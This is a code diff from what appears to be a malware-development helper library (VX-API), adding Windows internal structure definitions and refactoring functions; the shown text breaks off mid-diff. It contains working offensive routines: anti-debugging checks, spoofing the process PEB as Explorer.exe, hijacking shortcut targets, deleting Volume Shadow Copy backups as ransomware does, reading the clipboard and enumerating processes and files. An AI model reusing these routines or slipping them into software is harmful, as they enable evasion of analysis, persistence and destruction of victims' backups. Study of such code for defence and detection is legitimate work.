+typedef struct _LDR_MODULE {
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+	PVOID                   BaseAddress;
+	PVOID                   EntryPoint;
+	ULONG                   SizeOfImage;
+	UNICODE_STRING          FullDllName;
+	UNICODE_STRING          BaseDllName;
+	ULONG                   Flags;
+	SHORT                   LoadCount;
+	SHORT                   TlsIndex;
+	LIST_ENTRY              HashTableEntry;
+	ULONG                   TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+	ULONG                   Length;
+	ULONG                   Initialized;
+	PVOID                   SsHandle;
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _CURDIR {
+	UNICODE_STRING DosPath;
+	PVOID Handle;
+}CURDIR, * PCURDIR;
+
+typedef struct _STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PCHAR  Buffer;
+} ANSI_STRING, * PANSI_STRING;
+
+typedef struct _RTL_DRIVE_LETTER_CURDIR {
+	WORD Flags;
+	WORD Length;
+	ULONG TimeStamp;
+	ANSI_STRING DosPath;
+} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+	ULONG MaximumLength;
+	ULONG Length;
+	ULONG Flags;
+	ULONG DebugFlags;
+	PVOID ConsoleHandle;
+	ULONG ConsoleFlags;
+	PVOID StandardInput;
+	PVOID StandardOutput;
+	PVOID StandardError;
+	CURDIR CurrentDirectory;
+	UNICODE_STRING DllPath;
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+	PVOID Environment;
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING WindowTitle;
+	UNICODE_STRING DesktopInfo;
+	UNICODE_STRING ShellInfo;
+	UNICODE_STRING RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
+	ULONG EnvironmentSize;
+}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _PEB {
+	BOOLEAN                 InheritedAddressSpace;
+	BOOLEAN                 ReadImageFileExecOptions;
+	BOOLEAN                 BeingDebugged;
+	BOOLEAN                 Spare;
+	HANDLE                  Mutant;
+	PVOID                   ImageBase;
+	PPEB_LDR_DATA           LoaderData;
+	PRTL_USER_PROCESS_PARAMETERS                   ProcessParameters;
+	PVOID                   SubSystemData;
+	PVOID                   ProcessHeap;
+	PVOID                   FastPebLock;
+	PVOID                   FastPebLockRoutine;
+	PVOID                   FastPebUnlockRoutine;
+	ULONG                   EnvironmentUpdateCount;
+	PVOID* KernelCallbackTable;
+	PVOID                   EventLogSection;
+	PVOID                   EventLog;
+	PVOID                   FreeList;
+	ULONG                   TlsExpansionCounter;
+	PVOID                   TlsBitmap;
+	ULONG                   TlsBitmapBits[0x2];
+	PVOID                   ReadOnlySharedMemoryBase;
+	PVOID                   ReadOnlySharedMemoryHeap;
+	PVOID* ReadOnlyStaticServerData;
+	PVOID                   AnsiCodePageData;
+	PVOID                   OemCodePageData;
+	PVOID                   UnicodeCaseTableData;
+	ULONG                   NumberOfProcessors;
+	ULONG                   NtGlobalFlag;
+	BYTE                    Spare2[0x4];
+	LARGE_INTEGER           CriticalSectionTimeout;
+	ULONG                   HeapSegmentReserve;
+	ULONG                   HeapSegmentCommit;
+	ULONG                   HeapDeCommitTotalFreeThreshold;
+	ULONG                   HeapDeCommitFreeBlockThreshold;
+	ULONG                   NumberOfHeaps;
+	ULONG                   MaximumNumberOfHeaps;
+	PVOID** ProcessHeaps;
+	PVOID                   GdiSharedHandleTable;
+	PVOID                   ProcessStarterHelper;
+	PVOID                   GdiDCAttributeList;
+	PVOID                   LoaderLock;
+	ULONG                   OSMajorVersion;
+	ULONG                   OSMinorVersion;
+	ULONG                   OSBuildNumber;
+	ULONG                   OSPlatformId;
+	ULONG                   ImageSubSystem;
+	ULONG                   ImageSubSystemMajorVersion;
+	ULONG                   ImageSubSystemMinorVersion;
+	ULONG                   GdiHandleBuffer[0x22];
+	ULONG                   PostProcessInitRoutine;
+	ULONG                   TlsExpansionBitmap;
+	BYTE                    TlsExpansionBitmapBits[0x80];
+	ULONG                   SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+}CLIENT_ID, * PCLIENT_ID;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+	struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+	PACTIVATION_CONTEXT ActivationContext;
+	ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+	PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+	LIST_ENTRY FrameListCache;
+	ULONG Flags;
+	ULONG NextCookieSequenceNumber;
+	ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _GDI_TEB_BATCH {
+	ULONG Offset;
+	ULONG HDC;
+	ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+	ULONG Flags;
+	PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+	ULONG Flags;
+	struct _TEB_ACTIVE_FRAME* Previous;
+	PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _TEB
+{
+	NT_TIB				NtTib;
+	PVOID				EnvironmentPointer;
+	CLIENT_ID			ClientId;
+	PVOID				ActiveRpcHandle;
+	PVOID				ThreadLocalStoragePointer;
+	PPEB				ProcessEnvironmentBlock;
+	ULONG               LastErrorValue;
+	ULONG               CountOfOwnedCriticalSections;
+	PVOID				CsrClientThread;
+	PVOID				Win32ThreadInfo;
+	ULONG               User32Reserved[26];
+	ULONG               UserReserved[5];
+	PVOID				WOW32Reserved;
+	LCID                CurrentLocale;
+	ULONG               FpSoftwareStatusRegister;
+	PVOID				SystemReserved1[54];
+	LONG                ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+	ULONG                  TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+	ACTIVATION_CONTEXT_STACK ActivationContextStack;
+	UCHAR                  SpareBytes1[24];
+#endif
+	GDI_TEB_BATCH			GdiTebBatch;
+	CLIENT_ID				RealClientId;
+	PVOID					GdiCachedProcessHandle;
+	ULONG                   GdiClientPID;
+	ULONG                   GdiClientTID;
+	PVOID					GdiThreadLocalInfo;
+	PSIZE_T					Win32ClientInfo[62];
+	PVOID					glDispatchTable[233];
+	PSIZE_T					glReserved1[29];
+	PVOID					glReserved2;
+	PVOID					glSectionInfo;
+	PVOID					glSection;
+	PVOID					glTable;
+	PVOID					glCurrentRC;
+	PVOID					glContext;
+	NTSTATUS                LastStatusValue;
+	UNICODE_STRING			StaticUnicodeString;
+	WCHAR                   StaticUnicodeBuffer[261];
+	PVOID					DeallocationStack;
+	PVOID					TlsSlots[64];
+	LIST_ENTRY				TlsLinks;
+	PVOID					Vdm;
+	PVOID					ReservedForNtRpc;
+	PVOID					DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                   HardErrorMode;
+#else
+	ULONG                  HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID					Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+	GUID                    ActivityId;
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+	PVOID					EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID					Instrumentation[14];
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+#else
+	PVOID					Instrumentation[16];
+#endif
+	PVOID					WinSockData;
+	ULONG					GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	BOOLEAN                SpareBool0;
+	BOOLEAN                SpareBool1;
+	BOOLEAN                SpareBool2;
+#else
+	BOOLEAN                InDbgPrint;
+	BOOLEAN                FreeStackOnTermination;
+	BOOLEAN                HasFiberData;
+#endif
+	UCHAR                  IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                  GuaranteedStackBytes;
+#else
+	ULONG                  Spare3;
+#endif
+	PVOID				   ReservedForPerf;
+	PVOID				   ReservedForOle;
+	ULONG                  WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID				   SavedPriorityState;
+	ULONG_PTR			   SoftPatchPtr1;
+	ULONG_PTR			   ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG_PTR			   SparePointer1;
+	ULONG_PTR              SoftPatchPtr1;
+	ULONG_PTR              SoftPatchPtr2;
+#else
+	Wx86ThreadState        Wx86Thread;
+#endif
+	PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+	PVOID                  DeallocationBStore;
+	PVOID                  BStoreLimit;
+#endif
+	ULONG                  ImpersonationLocale;
+	ULONG                  IsImpersonating;
+	PVOID                  NlsCache;
+	PVOID                  pShimData;
+	ULONG                  HeapVirtualAffinity;
+	HANDLE                 CurrentTransactionHandle;
+	PTEB_ACTIVE_FRAME      ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID PreferredLangauges;
+	PVOID UserPrefLanguages;
+	PVOID MergedPrefLanguages;
+	ULONG MuiImpersonation;
+	union
+	{
+		struct
+		{
+			USHORT SpareCrossTebFlags : 16;
+		};
+		USHORT CrossTebFlags;
+	};
+	union
+	{
+		struct
+		{
+			USHORT DbgSafeThunkCall : 1;
+			USHORT DbgInDebugPrint : 1;
+			USHORT DbgHasFiberData : 1;
+			USHORT DbgSkipThreadAttach : 1;
+			USHORT DbgWerInShipAssertCode : 1;
+			USHORT DbgIssuedInitialBp : 1;
+			USHORT DbgClonedThread : 1;
+			USHORT SpareSameTebBits : 9;
+		};
+		USHORT SameTebFlags;
+	};
+	PVOID TxnScopeEntercallback;
+	PVOID TxnScopeExitCAllback;
+	PVOID TxnScopeContext;
+	ULONG LockCount;
+	ULONG ProcessRundown;
+	ULONG64 LastSwitchTime;
+	ULONG64 TotalSwitchOutTime;
+	LARGE_INTEGER WaitReasonBitMap;
+#else
+	BOOLEAN SafeThunkCall;
+	BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _KSYSTEM_TIME
+{
+	ULONG LowPart;
+	LONG High1Time;
+	LONG High2Time;
+} KSYSTEM_TIME, * PKSYSTEM_TIME;
+
+typedef enum _NT_PRODUCT_TYPE
+{
+	NtProductWinNt = 1,
+	NtProductLanManNt = 2,
+	NtProductServer = 3
+} NT_PRODUCT_TYPE;
+
+typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
+{
+	StandardDesign = 0,
+	NEC98x86 = 1,
+	EndAlternatives = 2
+} ALTERNATIVE_ARCHITECTURE_TYPE;
+
+typedef struct _KUSER_SHARED_DATA {
+	ULONG                         TickCountLowDeprecated;
+	ULONG                         TickCountMultiplier;
+	KSYSTEM_TIME                  InterruptTime;
+	KSYSTEM_TIME                  SystemTime;
+	KSYSTEM_TIME                  TimeZoneBias;
+	USHORT                        ImageNumberLow;
+	USHORT                        ImageNumberHigh;
+	WCHAR                         NtSystemRoot[260];
+	ULONG                         MaxStackTraceDepth;
+	ULONG                         CryptoExponent;
+	ULONG                         TimeZoneId;
+	ULONG                         LargePageMinimum;
+	ULONG                         AitSamplingValue;
+	ULONG                         AppCompatFlag;
+	ULONGLONG                     RNGSeedVersion;
+	ULONG                         GlobalValidationRunlevel;
+	LONG                          TimeZoneBiasStamp;
+	ULONG                         NtBuildNumber;
+	NT_PRODUCT_TYPE               NtProductType;
+	BOOLEAN                       ProductTypeIsValid;
+	BOOLEAN                       Reserved0[1];
+	USHORT                        NativeProcessorArchitecture;
+	ULONG                         NtMajorVersion;
+	ULONG                         NtMinorVersion;
+	BOOLEAN                       ProcessorFeatures[PROCESSOR_FEATURE_MAX];
+	ULONG                         Reserved1;
+	ULONG                         Reserved3;
+	ULONG                         TimeSlip;
+	ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
+	ULONG                         BootId;
+	LARGE_INTEGER                 SystemExpirationDate;
+	ULONG                         SuiteMask;
+	BOOLEAN                       KdDebuggerEnabled;
+	union {
+		UCHAR MitigationPolicies;
+		struct {
+			UCHAR NXSupportPolicy : 2;
+			UCHAR SEHValidationPolicy : 2;
+			UCHAR CurDirDevicesSkippedForDlls : 2;
+			UCHAR Reserved : 2;
+		};
+	};
+	USHORT                        CyclesPerYield;
+	ULONG                         ActiveConsoleId;
+	ULONG                         DismountCount;
+	ULONG                         ComPlusPackage;
+	ULONG                         LastSystemRITEventTickCount;
+	ULONG                         NumberOfPhysicalPages;
+	BOOLEAN                       SafeBootMode;
+	UCHAR                         VirtualizationFlags;
+	UCHAR                         Reserved12[2];
+	union {
+		ULONG SharedDataFlags;
+		struct {
+			ULONG DbgErrorPortPresent : 1;
+			ULONG DbgElevationEnabled : 1;
+			ULONG DbgVirtEnabled : 1;
+			ULONG DbgInstallerDetectEnabled : 1;
+			ULONG DbgLkgEnabled : 1;
+			ULONG DbgDynProcessorEnabled : 1;
+			ULONG DbgConsoleBrokerEnabled : 1;
+			ULONG DbgSecureBootEnabled : 1;
+			ULONG DbgMultiSessionSku : 1;
+			ULONG DbgMultiUsersInSessionSku : 1;
+			ULONG DbgStateSeparationEnabled : 1;
+			ULONG SpareBits : 21;
+		} DUMMYSTRUCTNAME2;
+	} DUMMYUNIONNAME2;
+	ULONG                         DataFlagsPad[1];
+	ULONGLONG                     TestRetInstruction;
+	LONGLONG                      QpcFrequency;
+	ULONG                         SystemCall;
+	ULONG                         Reserved2;
+	ULONGLONG                     SystemCallPad[2];
+	union {
+		KSYSTEM_TIME TickCount;
+		ULONG64      TickCountQuad;
+		struct {
+			ULONG ReservedTickCountOverlay[3];
+			ULONG TickCountPad[1];
+		} DUMMYSTRUCTNAME;
+	} DUMMYUNIONNAME3;
+	ULONG                         Cookie;
+	ULONG                         CookiePad[1];
+	LONGLONG                      ConsoleSessionForegroundProcessId;
+	ULONGLONG                     TimeUpdateLock;
+	ULONGLONG                     BaselineSystemTimeQpc;
+	ULONGLONG                     BaselineInterruptTimeQpc;
+	ULONGLONG                     QpcSystemTimeIncrement;
+	ULONGLONG                     QpcInterruptTimeIncrement;
+	UCHAR                         QpcSystemTimeIncrementShift;
+	UCHAR                         QpcInterruptTimeIncrementShift;
+	USHORT                        UnparkedProcessorCount;
+	ULONG                         EnclaveFeatureMask[4];
+	ULONG                         TelemetryCoverageRound;
+	USHORT                        UserModeGlobalLogger[16];
+	ULONG                         ImageFileExecutionOptions;
+	ULONG                         LangGenerationCount;
+	ULONGLONG                     Reserved4;
+	ULONGLONG                     InterruptTimeBias;
+	ULONGLONG                     QpcBias;
+	ULONG                         ActiveProcessorCount;
+	UCHAR                         ActiveGroupCount;
+	UCHAR                         Reserved9;
+	union {
+		USHORT QpcData;
+		struct {
+			UCHAR QpcBypassEnabled;
+			UCHAR QpcShift;
+		};
+	};
+	LARGE_INTEGER                 TimeZoneBiasEffectiveStart;
+	LARGE_INTEGER                 TimeZoneBiasEffectiveEnd;
+	XSTATE_CONFIGURATION          XState;
+	KSYSTEM_TIME                  FeatureConfigurationChangeStamp;
+	ULONG                         Spare;
+} KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;

VX-API/IsDebuggerPresentEx.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+BOOL IsDebuggerPresentEx(VOID)
+{
+	return GetPeb()->BeingDebugged;
+}

VX-API/IsIntelHardwareBreakpointPresent.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 BOOL IsIntelHardwareBreakpointPresent(VOID)
 {
 	BOOL bFlag = FALSE;
@@ -11,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
 
 	Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
 
-	if (!GetThreadContext(RfGetCurrentThread(), Context))
+	if (!GetThreadContext(GetCurrentThreadEx(), Context))
 		goto EXIT_ROUTINE;
 
 	if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)
@@ -23,4 +25,4 @@ EXIT_ROUTINE:
 		VirtualFree(Context, 0, MEM_RELEASE);
 
 	return bFlag;
-}
+}

VX-API/IsNvidiaGraphicsCardPresent.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 BOOL IsNvidiaGraphicsCardPresentA(VOID)
 {
 	DISPLAY_DEVICEA DisplayDevice; RtlZeroMemory(&DisplayDevice, sizeof(DISPLAY_DEVICEA));
@@ -29,4 +31,4 @@ BOOL IsNvidiaGraphicsCardPresentW(VOID)
 	}
 
 	return FALSE;
-}
+}

VX-API/IsPathValid.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 BOOL IsPathValidA(PCHAR FilePath)
 {
 	HANDLE hFile = INVALID_HANDLE_VALUE;

VX-API/IsProcessRunning.cpp

@@ -1,3 +1,7 @@
+#include "Win32Helper.h"
+
+#include <psapi.h>
+
 BOOL IsProcessRunningA(PCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
 {
 	HANDLE hProcess = NULL;
@@ -98,4 +102,4 @@ BOOL IsProcessRunningW(PWCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
 	}
 
 	return FALSE;
-}
+}

VX-API/IsProcessRunningAsAdmin.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 BOOL IsProcessRunningAsAdmin(VOID)
 {
 	HANDLE hToken = NULL;
@@ -5,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
 	DWORD dwSize = 0;
 	BOOL bFlag = FALSE;
 
-	if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_QUERY, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_QUERY, &hToken))
 		goto EXIT_ROUTINE;
 
 	if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))
@@ -16,10 +18,10 @@ BOOL IsProcessRunningAsAdmin(VOID)
 EXIT_ROUTINE:
 
 	if (!bFlag)
-		EhSetLastError(ERROR_ACCESS_DENIED);
+		SetLastErrorEx(ERROR_ACCESS_DENIED);
 
 	if (hToken)
 		CloseHandle(hToken);
 
 	return (bFlag ? Elevation.TokenIsElevated : FALSE);
-}
+}

VX-API/Main.cpp

@@ -0,0 +1,18 @@
+#include <Windows.h>
+#include "Internal.h"
+#include "StringManipulation.h"
+#include "Win32Helper.h"
+
+/*
+TODO:
+--Ping 'IcmpSendEcho2Ex'
+
+
+*/
+
+
+int main(VOID)
+{
+	DWORD dwError = ERROR_SUCCESS;
+	return ERROR_SUCCESS;
+}

VX-API/MasqueradePebAsExplorerEx.cpp

@@ -1,7 +1,5 @@
-/*
-Function to masquerade PEB originally by @FuzzySec / @Cneelis
-Optimized and unnecessary functionality removed by smelly__vx
-*/
+#include "Win32Helper.h"
+
 BOOL MasqueradePebAsExplorerEx(VOID)
 {
 	typedef NTSTATUS(NTAPI* RTLENTERCRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection);
@@ -16,12 +14,12 @@ BOOL MasqueradePebAsExplorerEx(VOID)
 
 	Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
 
-	hModule = RfGetModuleHandleW(L"ntdll.dll");
+	hModule = GetModuleHandleExW(L"ntdll.dll");
 	if (hModule == NULL)
 		return FALSE;
 
-	RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
-	RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
+	RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
+	RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
 
 	if (!RtlEnterCriticalSection || !RtlLeaveCriticalSection)
 		return FALSE;
@@ -33,10 +31,13 @@ BOOL MasqueradePebAsExplorerEx(VOID)
 
 	RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, wExplorerPath);
 	RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, wExplorerPath);
+
+	Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Blink - 16);
+
 	RtlInitUnicodeString(&Module->FullDllName, wExplorerPath);
 	RtlInitUnicodeString(&Module->BaseDllName, L"Explorer.exe");
 
 	RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
 
 	return TRUE;
-}
+}

VX-API/MpfComModifyShortcutTarget.cpp

@@ -1,17 +1,15 @@
-/*
-LnkPath = L"C:\\Users\\User1\\Desktop\\Chrome.exe.lnk" <--- MUST BE .LNK!
-NewValue = L"C:\\Windows\\System32\\calc.exe"
+#include "Win32Helper.h"
 
-Chrome.exe.lnk on desktop now launches calc.exe
-*/
+#include <shobjidl_core.h>
+#include <shlguid.h>
 
-BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
+BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR LnkExecutionProperty)
 {
 	HRESULT Result = S_OK;
 	IShellLinkW* Shell = NULL;
 	IPersistFile* Persist = NULL;
 	BOOL bFlag = FALSE;
-	WIN32_FIND_DATAW Dispose = {0};
+	WIN32_FIND_DATAW Dispose = { 0 };
 	WCHAR PathData[MAX_PATH * sizeof(WCHAR)] = { 0 };
 
 	if (CoInitialize(NULL) != S_OK)
@@ -34,7 +32,7 @@ BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
 		goto EXIT_ROUTINE;
 #pragma warning(pop)
 
-	if (Shell->SetPath(NewValue) != S_OK)
+	if (Shell->SetPath(LnkExecutionProperty) != S_OK)
 		goto EXIT_ROUTINE;
 
 	if (Persist->Save(LnkPath, FALSE) != S_OK)
@@ -58,7 +56,7 @@ EXIT_ROUTINE:
 	return bFlag;
 }
 
-BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
+BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR LnkExecutionProperty)
 {
 	HRESULT Result = S_OK;
 	IShellLinkW* Shell = NULL;
@@ -73,7 +71,7 @@ BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
 	if (CharStringToWCharString(lpwLnkPath, LnkPath, StringLengthA(LnkPath)) == 0)
 		goto EXIT_ROUTINE;
 
-	if (CharStringToWCharString(lpwNewValue, NewValue, StringLengthA(NewValue)) == 0)
+	if (CharStringToWCharString(lpwNewValue, LnkExecutionProperty, StringLengthA(LnkExecutionProperty)) == 0)
 		goto EXIT_ROUTINE;
 
 	if (CoInitialize(NULL) != S_OK)
@@ -118,4 +116,4 @@ EXIT_ROUTINE:
 	CoUninitialize();
 
 	return bFlag;
-}
+}

VX-API/MpfComVssDeleteShadowVolumeBackups.cpp

@@ -1,7 +1,5 @@
-/*
+#include "Win32Helper.h"
 
-Credit: am0nsec
-*/
 
 CONST IID IID_IVssCoordinator = { 0xda9f41d4, 0x1a5d, 0x41d0, {0xa6, 0x14, 0x6d, 0xfd, 0x78, 0xdf, 0x5d, 0x05} };
 CONST IID CLSID_CVssCoordinator = { 0xe579ab5f, 0x1cc4, 0x44b4, {0xbe, 0xd9, 0xde, 0x09, 0x91, 0xff, 0x06, 0x23} };
@@ -156,7 +154,7 @@ DWORD InitializeComWithSecurityContextDefault(BOOL DisableSeh)
 
 EXIT_ROUTINE:
 
-	return EhWin32FromHResult(Result);
+	return Win32FromHResult(Result);
 }
 
 DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
@@ -210,8 +208,8 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
 		if (Element.Type != VSS_OBJECT_SNAPSHOT)
 			continue;
 
-		RtlZeroMemory(ShadowCopyId, (32 * sizeof(WCHAR)));
-		RtlZeroMemory(ShadowCopySetId, (32 * sizeof(WCHAR)));
+		ZeroMemoryEx(ShadowCopyId, (32 * sizeof(WCHAR)));
+		ZeroMemoryEx(ShadowCopySetId, (32 * sizeof(WCHAR)));
 
 #pragma warning( push )
 #pragma warning( disable : 6386)
@@ -231,10 +229,10 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
 EXIT_ROUTINE:
 
 	if (ShadowCopyId)
-		HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopyId);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopyId);
 
 	if (ShadowCopySetId)
-		HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopySetId);
+		HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopySetId);
 
 	if (EnumObject)
 		EnumObject->Release();
@@ -245,5 +243,5 @@ EXIT_ROUTINE:
 	if (CoUninitializeAfterCompletion)
 		CoUninitialize();
 
-	return EhWin32FromHResult(Result);
-}
+	return Win32FromHResult(Result);
+}

VX-API/OleGetClipboardData.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 DWORD OleGetClipboardDataA(PCHAR Buffer)
 {
 	DWORD dwError = ERROR_SUCCESS;
@@ -34,9 +36,9 @@ EXIT_ROUTINE:
 	if (!bFlag)
 	{
 		if (Result != S_OK)
-			dwError = EhWin32FromHResult(Result);
+			dwError = Win32FromHResult(Result);
 		else
-			dwError = EhGetLastError();
+			dwError = GetLastErrorEx();
 	}
 
 #pragma warning( push )
@@ -88,9 +90,9 @@ EXIT_ROUTINE:
 	if (!bFlag)
 	{
 		if (Result != S_OK)
-			dwError = EhWin32FromHResult(Result);
+			dwError = Win32FromHResult(Result);
 		else
-			dwError = EhGetLastError();
+			dwError = GetLastErrorEx();
 	}
 
 #pragma warning( push )
@@ -103,4 +105,4 @@ EXIT_ROUTINE:
 		DataObject->Release();
 
 	return dwError;
-}
+}

VX-API/RecursiveFindFile.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 PVOID UserDefinedCallbackRoutineA(LPCSTR Path)
 {
 	return 0;
@@ -8,7 +10,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
 	typedef LPWSTR(WINAPI* PATHCOMBINEA)(LPCSTR, LPCSTR, LPCSTR);
 	PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;
 
-	HANDLE HeapHandle = RfGetProcessHeap();
+	HANDLE HeapHandle = GetProcessHeapEx();
 	CHAR szFullPattern[MAX_PATH] = { 0 };
 	WIN32_FIND_DATAA FindData = { 0 };
 	HANDLE FindHandle = INVALID_HANDLE_VALUE;
@@ -31,7 +33,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
 			if (FindData.cFileName[0] == '$')
 				continue;
 
-			RfZeroMemory(szFullPattern, MAX_PATH);
+			ZeroMemoryEx(szFullPattern, MAX_PATH);
 			if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
 				goto EXIT_ROUTINE;
 
@@ -52,7 +54,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
 
 	do
 	{
-		RfZeroMemory(szFullPattern, MAX_PATH);
+		ZeroMemoryEx(szFullPattern, MAX_PATH);
 		if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
 		{
 			if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
@@ -88,7 +90,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
 	BOOL bIsNewlyLoaded = FALSE;
 	BOOL bFlag = FALSE;
 
-	hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
+	hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
 	if (hShlwapi == NULL)
 	{
 		bIsNewlyLoaded = TRUE;
@@ -97,7 +99,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
